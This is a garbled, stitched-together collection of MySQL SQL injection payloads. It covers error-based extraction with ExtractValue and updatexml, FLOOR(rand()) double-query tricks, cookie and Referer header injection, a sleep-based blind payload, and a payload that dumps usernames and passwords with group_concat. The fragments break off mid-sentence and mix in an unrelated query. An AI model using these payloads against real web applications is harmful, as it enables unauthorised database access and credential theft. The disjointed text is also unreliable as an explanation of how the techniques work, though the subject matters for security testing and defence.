Numeric: Query like SELECT * FROM Table WHERE id = FUZZ
AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));-- Available in MySQL 5.1.5.
Select sum(record_count) as total_database_record_ct from tcounts
1 AND (SELECT 1 FROM (SELECT COUNT(*),concat(0x3a,(SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="table1" LIMIT 0,1),0x3a,FLOOR(rand(0)*2))a FROM information_schema.COLUMNS GROUP BY a LIMIT 0,1)b)
x from information_schema.tables group by x)a) and '1'='1. Retrieving the names of all tables: Note: m-n means the result is evaluated for the values m=0, m+1…n-1; replace hex_code_of_database_name with the required value, and replace m-n with the required value.
The injection point is at the Referer position. 3. Cookie injection. Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#.
clause Payload: id=3 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)
e.g. select !(select * from (select version())x) - ~0; here ~ is bitwise negation and ! casts the string to a number.
$post_data = any data',(select group_concat(username,0x3a,password) from any_table_name_here))--. You can also use LIMIT if required; if you don't know how to use LIMIT, go and read Death Row Injection. Happy Hacking.
Comment added by: -1 AND (SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25))-- 1 Date